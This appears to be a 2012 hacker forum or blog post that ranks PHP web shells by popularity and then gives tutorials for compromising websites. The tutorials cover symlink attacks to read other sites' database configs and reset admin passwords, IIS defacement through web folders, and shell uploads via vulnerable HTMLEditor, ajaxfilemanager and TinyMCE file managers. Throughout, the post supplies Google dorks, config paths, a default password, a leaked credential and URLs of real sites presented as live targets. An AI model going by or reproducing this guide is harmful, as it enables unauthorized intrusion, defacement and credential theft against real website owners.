Top 5 Php Shells in 2012

hello guyz ! gud mornig
Shell is a importent part of web applications and website hacking, we can do our work easily with Shells,
so here we collected top 5 most popular and usefull shelles in 2012

1- b374km1n1 Modified by Newbie3viLc063s v.2012
mostly hackers used b374k shell for defacing and other works, here is latest version of  b374k m1n1, re coded by Newbie3viLc063 hackers.
New fuctions in this shell :

• OpenDIR 
• Symlink
• SQLI Scan 
• Website Whois 
• Port-Scanner 
• WP Reset 
• Jomlaa Reset 
• CMS Scanner 
• VB Changer 
• String Encoder 
• SQL Backup 
• WHMCS Decoder 
• Security Mode
•  Process

Download 

2- Sym 2.0 (auto symlink shell)

Manual Symlink takes a lot of time in finding platform of website and Configuration files, so we use sym 2.0 for auto symlink, 

in this shell you can check website's url and thier Configuration by single click

Download  

3- WSO shell
 

wso is one of the Most Pouplar shelles used by hackers, this shell having Good Interface and fuctions 

Download 

4- 404 Not found Shell 

404 shell is a Modified version of wso shell, sometimes after upload your shell some guys find it using scanners and they use your shells, and shells also can be find with google dorks,so we use this undetectable and password protected shell, its will show to a 404 page if someone else will acess it, to login in this shell press tab. 

Download this shell from here
5-Madspot Shell
 

Madshpot shell is coded by MadSpot Security Team, Madspot shell's interface is also Good, and having Latest Features too.

Download

Symlink Tutorial~

First of all download the symlink shells needed from here:---

http://www.ziddu.com/download/19084984/symlink.rar.html

Now there you will get 2 shells named dbman.php (Database Manager n00b!) and

sym.php (the main tool auto symlinker ;) ) 

Now you should have a shelld site of course :P

Now upload both shells in any writeable directory

Next step is to open both shells (Open in different tabs)

Now goto sym.php and click on user and domains it'll list you all sites on dat server also after opening you'll get to see symlink option now choose any site and symlink :D

(If you select the domains and script option it'll list you all wp, joomla, vbulletin etc sites on d server)

Find the config file on d site you symlinked and read it you'll see sumthing like this:----

/** MySQL database username */

define('DB_USER', 'csseguid_nauqri');

/** MySQL database password */

define('DB_PASSWORD', 'qwe0345**');

/** MySQL hostname */

define('DB_HOST', 'localhost');

Now after reading config.php file u got the sites database username and pass

next we will login using dat credentials into our database manager shell

after logging in just find the admin table and change d pass to your own md5 hash

nw u have reset d admins pass to your own ;0 go and login into the site admin panel :D

Database config files locations:

vBulletin -- /includes/config.php

IPB -- /conf_global.php

MyBB -- /inc/config.php Phpbb -- /config.php

Php Nuke -- /config.php Php-Fusion -- config.php

SMF -- /Settings.php

Joomla -- configuration.php , configuration.php-dist

WordPress -- /wp-config.php

Drupal -- /sites/default/settings.php

Oscommerce -- /includes/configure.php

e107 -- /e107_config.php

Seditio -- /datas/config.php

HERE IS THE VIDEO TUTORIAL:https://www.youtube.com/watch?v=leQFgLxKr_M

IIS HACKING FOR WINDOWS XP

1:- Click on START and click on RUN then enter the below code and then press ENTER

Quote:%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


2:- you will get a new window or a folder name "WEB FOLDER"



3:- Right click and click on New, Add Web Folder then enter your vulnerable website address as show below in the image


to find more website you can use dork

Google Dork :- "Powered by IIS"



4:- Click on Next , Next , Finish

click on that folder and open it

now just copy your deface page and past it into that file
and that site will be defaced.sometimes you have to use shell
https://www.youtube.com/watch?v=P4ISzsSBTik HERE IS THE YOUTUBE VIDEO

Html editor File Upload vulnerability

Html editor File Upload vulnerability
Google Dork : inurl:/HTMLEditor/editor/ 
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"


Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


Go here : 

http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
 chnage connectors into PhP (Like FCKeditor) and upload Your file


suppoted files : .TXT and .JPG in some site you can upload .html and .php too


to view you file goto : http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here 


Live Demo : http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://www.madhouse1.com/PowerCMS%20folder/files/aaaaaaaa.txt

Ajax File Manager ~ Shell and Files Upload Vulnerability

Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
 or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 


for example : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now Find Upload Upload and Upload Your shell/Deface/file


To view you File find /Uploaded/ directory in Website by using your brain :P


example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


if you need Login in any ajaxfilemanager 


Default Password Ajax File Manager
Username:ajax
Password:123456

Tinymce PHP file Manager, Remote File upload vulnrablity

Title :Tinymce PHP file Manager, Remote File upload vulnrablity
server : Linux
Author: NoentryPHC
Type : webapp Exploit 
Hamr : remote shell upload 
Dork : inurl:/file_manager.php?type=img
Goto google.com and type dork inurl:/file_manager.php?type=img & inurl:/file_manager.php?type=file to Find vulnrable websites, to get more sites you can modify this dork,
Exploit Patch : http://www.site.com/directory/tinymce/file_manager.php?type=file 
so Goto http://www.site.com/directory/tinymce/file_manager.php?type=file  and upload your file there,
if php & html uploading is denided, you can try Tamper Data and Live Http Headers
Live demo :
http://piter-ka.ru/media/tinymce/file_manager.php?type=file
http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img